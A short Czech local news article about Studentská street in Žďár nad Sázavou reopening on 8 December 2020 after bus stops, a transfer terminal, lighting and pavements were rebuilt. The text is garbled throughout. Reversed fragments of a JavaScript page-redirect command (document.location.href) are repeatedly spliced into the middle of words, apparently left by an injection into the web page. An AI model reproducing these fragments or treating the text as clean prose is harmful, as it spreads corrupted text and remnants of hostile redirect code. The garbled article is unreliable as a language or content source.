Rainbow page separator

Provoz se má do Studentské ulice vrátit 8. prosince

Pátek, 27. listopadu 2020

Žďár nad Sázavou / Pokud nedojde k výrazným klimatickým změnám, od úterý 8. prosince se pro běžnou dopravu opět otevře Studentská ulice. Od jarních měsíců je ulice uzavřena z důvodu výstavby dvou nových zastávek městské hromadné dopravy s přístřešky a takzvaného přestupního terminálu. S tím je spojena i celková revitalizace [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to úseku, k čemuž se přidala rovněž rekonstrukce vodovodních rozvodů v části Studentské ulice.

Původní zastaralé zastávky měly jednak nevhodné umístění, přičemž nové byly vyprojek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továny i se „zálivem“, kam se vejdou dva au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusy za sebou, aniž by při zastavování blokovaly au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobily jedoucí za nimi. Při přestavbě bylo v lokalitě vyměněno také veřejné osvětlení, obnovené chodníky jsou ze žulových kostek. Na vozovce závěrem přibude ještě nový asfal[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tový koberec a v nejbližším okolí se v jarních měsících počítá s výsadbou zeleně. Stavební práce mají být kompletně dokončeny na jaře, náklady byly vyčísleny na 7,3 milionu korun včetně DPH.